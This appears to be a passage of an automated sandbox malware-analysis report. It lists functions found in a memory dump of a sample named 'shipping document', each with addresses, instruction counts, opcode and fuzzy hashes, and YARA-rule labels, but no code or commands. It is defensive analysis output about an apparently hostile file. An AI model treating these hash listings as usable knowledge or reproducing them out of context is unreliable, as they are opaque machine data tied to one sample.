                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2199e6322faa104984a4ee423a563affc27c40aaf792db3a4387235fe2040ff3
                                                                                                • Instruction ID: 40f9960b7f9027b9a0e535e2afc7b6de4bec189e4fa3ece3d2b4e0722aef3f74
                                                                                                • Opcode Fuzzy Hash: 2199e6322faa104984a4ee423a563affc27c40aaf792db3a4387235fe2040ff3
                                                                                                • Instruction Fuzzy Hash: F3B18370A002658BDB75DF58C880BA9F7F5EF44704F1485E9D90AEB245EB709E85CB21
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0178E5E7 Relevance: .3, Instructions: 278COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: cbfbf73c450149eb9e7baad7081e223e82966c4628ea67f873770c2ff2d112c2
                                                                                                • Instruction ID: c76448264e366646380eed65d5867dc18d1097651077ddcad7988850e5e1d658
                                                                                                • Opcode Fuzzy Hash: cbfbf73c450149eb9e7baad7081e223e82966c4628ea67f873770c2ff2d112c2
                                                                                                • Instruction Fuzzy Hash: F0A12731F40655AFEB21EB6CC848FADFBB5EB00B14F150169EA11AB291DB749D40CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017A0185 Relevance: .3, Instructions: 276COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 540f7256d56594ff606c88cc48c4bb207b42498a0942806a1b8a968586d107ad
                                                                                                • Instruction ID: a7b46e8e089b76d851d33b36640889005cc036ac0f4432703b188337166952ef
                                                                                                • Opcode Fuzzy Hash: 540f7256d56594ff606c88cc48c4bb207b42498a0942806a1b8a968586d107ad
                                                                                                • Instruction Fuzzy Hash: 8AA1E470B0071A9FDB25DF69C490BAAF7B1FF94314F504629FA0597282EB38E811CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01834500 Relevance: .3, Instructions: 275COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ccd58551ab4d8946ed5143df3ee5a1e929413fb3302108886d317ddbd4c2adf3
                                                                                                • Instruction ID: 006dd22f3de7a909b4996cae74d144812ddad83feb4b55d1d4fc393af84118f5
                                                                                                • Opcode Fuzzy Hash: ccd58551ab4d8946ed5143df3ee5a1e929413fb3302108886d317ddbd4c2adf3
                                                                                                • Instruction Fuzzy Hash: CAA1BD72A046129FDB12DF28C984B5ABBE9FF88704F590A28E545DB651D334EE00CBD1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01832B57 Relevance: .3, Instructions: 266COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                                • Instruction ID: 4f210fdd375c48addb2fe39015eb14a4bef99c8fd8c869b4e357d9a3428ae59f
                                                                                                • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                                • Instruction Fuzzy Hash: 4CB13971E0061ADFDF19CFA9C884AADB7B6BF88310F188129E914E7355D730AA41CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017E60E0 Relevance: .3, Instructions: 264COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 04efd46d47053e8df287ec2350e92175637c1d8daeb1b93eb66aafe404272f23
                                                                                                • Instruction ID: 5df7bb3c23eb9846b08538fdd836e4e485090e76e1fd7b79d2fb3466e24eb499
                                                                                                • Opcode Fuzzy Hash: 04efd46d47053e8df287ec2350e92175637c1d8daeb1b93eb66aafe404272f23
                                                                                                • Instruction Fuzzy Hash: 00919E71E04216AFDF15CFA8D888BAEFBF9AB58710F154169F610EB245D734E9009BA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0177E3F0 Relevance: .3, Instructions: 261COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a5055e757f60a99296db21e5000b5536b97b90a4b73cd7a3a7e8dd1ec6099acc
                                                                                                • Instruction ID: 1db85fc20cffffe2c4ad890230dfe53fbedc5167a516e77b288b2e87f0e35338
                                                                                                • Opcode Fuzzy Hash: a5055e757f60a99296db21e5000b5536b97b90a4b73cd7a3a7e8dd1ec6099acc
                                                                                                • Instruction Fuzzy Hash: 87912431A00616CBEF24DB6CC884BBEFBA1EF94B14F2541A9EE059B345FA34D941CB51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017B6ACC Relevance: .2, Instructions: 226COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b654800d747ecf47fa471aef69e2651178a94361e8d4e166cc740d7a4531b6bd
                                                                                                • Instruction ID: 50116fadc3f2091b6efd2969103cd79bea17852906703c67ab97da337a5fb2f4
                                                                                                • Opcode Fuzzy Hash: b654800d747ecf47fa471aef69e2651178a94361e8d4e166cc740d7a4531b6bd
                                                                                                • Instruction Fuzzy Hash: B6815E71A0061A9BDB24CF69C990AFEFBF9FB48700F14852EE655D7640E334E940CB94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0182AB40 Relevance: .2, Instructions: 222COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                • Instruction ID: 5cd560662c1b2b34f2bcc2ac28c0cf7fd34025aebedddc76293c3adce474c566
                                                                                                • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                • Instruction Fuzzy Hash: FF817171A0021A9FDF1ECF58C480AAEBBF2BF84310F148569D916DB785D774DA81CB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0179E284 Relevance: .2, Instructions: 212COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b914a1c4cadb961ca34b2d0058c3305e5bb427717eb319ca8ad9ec36e087ebb6
                                                                                                • Instruction ID: 2c3945685d591a0194ad0883ac1dfd9d10ff4aae8f99f7c38ab5437125d30718
                                                                                                • Opcode Fuzzy Hash: b914a1c4cadb961ca34b2d0058c3305e5bb427717eb319ca8ad9ec36e087ebb6
                                                                                                • Instruction Fuzzy Hash: 32813E71A00609AFDF25CFA9D880AEEFBB9FF88354F144429E555A7250DB30AD49CB60
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0177C640 Relevance: .2, Instructions: 206COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: dc6913c27c1b09f8972db054a6c8968637579bfef8baac5273a558812997a020
                                                                                                • Instruction ID: 19926d006fa0d3e232164dc09adcc42c43237fd3c076dcbf3e0e31760329f316
                                                                                                • Opcode Fuzzy Hash: dc6913c27c1b09f8972db054a6c8968637579bfef8baac5273a558812997a020
                                                                                                • Instruction Fuzzy Hash: 7171BD75D046269BCB268F58D8907BEFBB0FF5CB10F1441AEE942AB350E7349940CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 018147A0 Relevance: .2, Instructions: 202COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: bbee8980527724012d73b5b637f6fd33b82c627e7eb7e8c6b6040b189c7f004b
                                                                                                • Instruction ID: 66937dcd52378cd94d0e00c13b97e2b0e31bc6983e14fc783ead4021516573fb
                                                                                                • Opcode Fuzzy Hash: bbee8980527724012d73b5b637f6fd33b82c627e7eb7e8c6b6040b189c7f004b
                                                                                                • Instruction Fuzzy Hash: 53718FB2900305EFDB20CF59D944A9ABBF9EB84300F65465AE601EB26DE7358B40CF54
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0177260B Relevance: .2, Instructions: 201COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 86a5fe46c7ea770314d2969e5016f331956f8952c571b440ce916ef52907ffbb
                                                                                                • Instruction ID: 62d15e4f2e4cef0e81b1741e78ed5655478b7c71558289a141b6dac70d0b75c5
                                                                                                • Opcode Fuzzy Hash: 86a5fe46c7ea770314d2969e5016f331956f8952c571b440ce916ef52907ffbb
                                                                                                • Instruction Fuzzy Hash: D471D0356042428FD712DF2CC484B2AF7E5FF84710F0485AAE9A8CB756DB34D986CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017E035C Relevance: .2, Instructions: 198COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                • Instruction ID: b4112b8d9f280ae2618a84be689b58bf35c88562d055a3d0da8b2cecc7e53df3
                                                                                                • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                • Instruction Fuzzy Hash: F9716D71A0060AAFDB10DFA9C988EAEFBF9FF58300F104569E505E7294DB70EA01CB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017F62A0 Relevance: .2, Instructions: 198COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 46f52b72c1d28728aac9d2f1cfb9dccb79079dc5ad207bfa341c514381f2f0ee
                                                                                                • Instruction ID: 0590ac56d091b620d3078c24c81ecef40269b7caf81a3ebcde3851aec57c6919
                                                                                                • Opcode Fuzzy Hash: 46f52b72c1d28728aac9d2f1cfb9dccb79079dc5ad207bfa341c514381f2f0ee
                                                                                                • Instruction Fuzzy Hash: 28719D32200601AFEB229F18C848F67FBA6EF44760F15492CF7568B7A1D775EA44DB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01768AA0 Relevance: .2, Instructions: 197COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: bd97fee10af106d85838c068a2a24ad6f53b3cce2f001c4d3089b1292463a73a
                                                                                                • Instruction ID: 27fe88fba05d15950a2cd5566f09197c17ed5fcc242bb74924a3e076de0824e6
                                                                                                • Opcode Fuzzy Hash: bd97fee10af106d85838c068a2a24ad6f53b3cce2f001c4d3089b1292463a73a
                                                                                                • Instruction Fuzzy Hash: E481AD72A083068FDB24CF9CD484BADF7B6FB48714F16416DD904AB286D7789E81CB94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01838324 Relevance: .2, Instructions: 192COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4e31b60c5a1980108a9bc064478a94bded29420dc012028f340f71d435c4c45e
                                                                                                • Instruction ID: 2c7330a1b471ef0c69d75387ea303072389315f438bbe56b0b910dc8036709c0
                                                                                                • Opcode Fuzzy Hash: 4e31b60c5a1980108a9bc064478a94bded29420dc012028f340f71d435c4c45e
                                                                                                • Instruction Fuzzy Hash: A5711971E00209AFDF16DF94C885FEEBBB8FB45354F144229F621E6290E774AA45CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0181A250 Relevance: .2, Instructions: 184COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 3b4c4d1de7e2daa31bfe4360f9c249730f8d670b7147a6936ca54595956d2e82
                                                                                                • Instruction ID: 4ca1ae3cd9a6dfcad7aa73476978246e039d0391dadd924c79be1416956fea06
                                                                                                • Opcode Fuzzy Hash: 3b4c4d1de7e2daa31bfe4360f9c249730f8d670b7147a6936ca54595956d2e82
                                                                                                • Instruction Fuzzy Hash: B351EF73506782AFD716DE68C888E5BBBECEBC4710F000929BA44DB154D770EE04CBA2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01808350 Relevance: .2, Instructions: 161COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 91e86442ae3701831d314dbebd607cc2239b3012f508f2df288e7fec56455218
                                                                                                • Instruction ID: 3c031368392d0c212af827d8f2e1641211b4eabf315aa6bca321a5b44f72b4fc
                                                                                                • Opcode Fuzzy Hash: 91e86442ae3701831d314dbebd607cc2239b3012f508f2df288e7fec56455218
                                                                                                • Instruction Fuzzy Hash: CD51BF70900B09DFDB62CF5AC884A6BFBF8BF95714F10461ED292976E1C770A685CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0179E443 Relevance: .2, Instructions: 158COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9d3e03daa56ed85f8540b25c0db8b01c722e8ed2eb2f08acf2091d5536562e71
                                                                                                • Instruction ID: 8dca16f44e782f96a0c30230175cb6fb5f9bcdadf638ebc75b6550077b5928c8
                                                                                                • Opcode Fuzzy Hash: 9d3e03daa56ed85f8540b25c0db8b01c722e8ed2eb2f08acf2091d5536562e71
                                                                                                • Instruction Fuzzy Hash: 3C51AD71200A05DFDB22EF69D984EAAF3F9FF14744F400869E61197260EB34ED44CB51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01804180 Relevance: .2, Instructions: 156COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: fdc9244a79f2a1bff99096b84070e0099dbc0cd8c2a854b21479ff0d949eea8f
                                                                                                • Instruction ID: 9852694beb8d3e84a5a9861af53e16d5104b8f6023710413d1c4653fcf4ac4d6
                                                                                                • Opcode Fuzzy Hash: fdc9244a79f2a1bff99096b84070e0099dbc0cd8c2a854b21479ff0d949eea8f
                                                                                                • Instruction Fuzzy Hash: 01516A7164830A9FD795DF29C881A6BB7E5BFC8308F454A2DF689C7290D730EA05CB52
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017845B1 Relevance: .2, Instructions: 156COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                • Instruction ID: 7fc3ce2b954b757bdea116ad89ae11ef26c17980ad062ff9c259315e1365ba6c
                                                                                                • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                • Instruction Fuzzy Hash: E4519171E4021BABDF15EFA8C444BEEFBB5AF45754F14406AEA02AB240D774DE44CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017EE9E0 Relevance: .2, Instructions: 154COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                • Instruction ID: 4dd4898bd913351bf815f41543b3e23b8cfb9800419cabff139b7073fb9beb13
                                                                                                • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                • Instruction Fuzzy Hash: 8451A931D0021AEFDF219F94C88CFAEFBF9AF48314F154A65D91167195EB709E4487A0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01828B28 Relevance: .2, Instructions: 152COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4e63eeac8dd6ce32596e435a1d2aaa9f51d2689571d45ed5eeaf23766221d8b9
                                                                                                • Instruction ID: e82832cdb1283e820cce5109a866732fc4e3abedef7c8085e83065b554a63d91
                                                                                                • Opcode Fuzzy Hash: 4e63eeac8dd6ce32596e435a1d2aaa9f51d2689571d45ed5eeaf23766221d8b9
                                                                                                • Instruction Fuzzy Hash: 0641D5B07016219BDF2BDB2DC894B7BBBDAEF92320F048619E955C72C1D734DA81C691
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017ECBF0 Relevance: .1, Instructions: 148COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 688f84c19c059a39bfc1265d26a13128f0acd3303fce2d5000a9603ed2a73d0a
                                                                                                • Instruction ID: 546186630a620c4fe7f5aac1f74591e77677ad7319269733bae050606d0361b0
                                                                                                • Opcode Fuzzy Hash: 688f84c19c059a39bfc1265d26a13128f0acd3303fce2d5000a9603ed2a73d0a
                                                                                                • Instruction Fuzzy Hash: C451BE79900216DFCB21DFA9C8889AEFBF9FF48358B604559D505A3305E736AE41CF90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0182A9D3 Relevance: .1, Instructions: 139COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                • Instruction ID: 7238125ce06f06770ae5a62c8102ce825ef7788fc2d76ba71d94856f1653c39a
                                                                                                • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                • Instruction Fuzzy Hash: 8741FC316007269FDB2ACF58C984A6AF7A9FF80314B05462EE953C7A44EB30EE44C7D1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017901F8 Relevance: .1, Instructions: 138COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2cb4fdaec5216e4816085fd85a01153c3dc6f5833ba0a6bbdef724bddd6f75fb
                                                                                                • Instruction ID: 966447b2886ef07c03ef8be39930ec5b9060b5c96e3b7284dcf769b1365c8370
                                                                                                • Opcode Fuzzy Hash: 2cb4fdaec5216e4816085fd85a01153c3dc6f5833ba0a6bbdef724bddd6f75fb
                                                                                                • Instruction Fuzzy Hash: 6F41AD369202199BDF14DF98D440AEEFBB8BF48710F1481AAF815F7250D7359D49CBA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0178EBFC Relevance: .1, Instructions: 138COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e13172029e2507b2bea8d83f56a2636b1bf744ba97d0c7843644113f17d68459
                                                                                                • Instruction ID: 3573b6eceefd7c4166633db6f368c57c22f13999cbb5bfab4788b0439baa528e
                                                                                                • Opcode Fuzzy Hash: e13172029e2507b2bea8d83f56a2636b1bf744ba97d0c7843644113f17d68459
                                                                                                • Instruction Fuzzy Hash: D441B4716043019FDB25EF28C888A2BF7E5FF88314F14496EE957C7616EB35E8848B51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017A2750 Relevance: .1, Instructions: 137COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                • Instruction ID: 6d36a431c9b9aa7531c7d87db90f25154e629e75f72049ae327745ce4f0e12ee
                                                                                                • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                • Instruction Fuzzy Hash: 29515B75A00219CFCB15CF9CC580AAEF7B2FF84724F2881A9D915A7351D770AE82CB90
                                                                                                Uniqueness

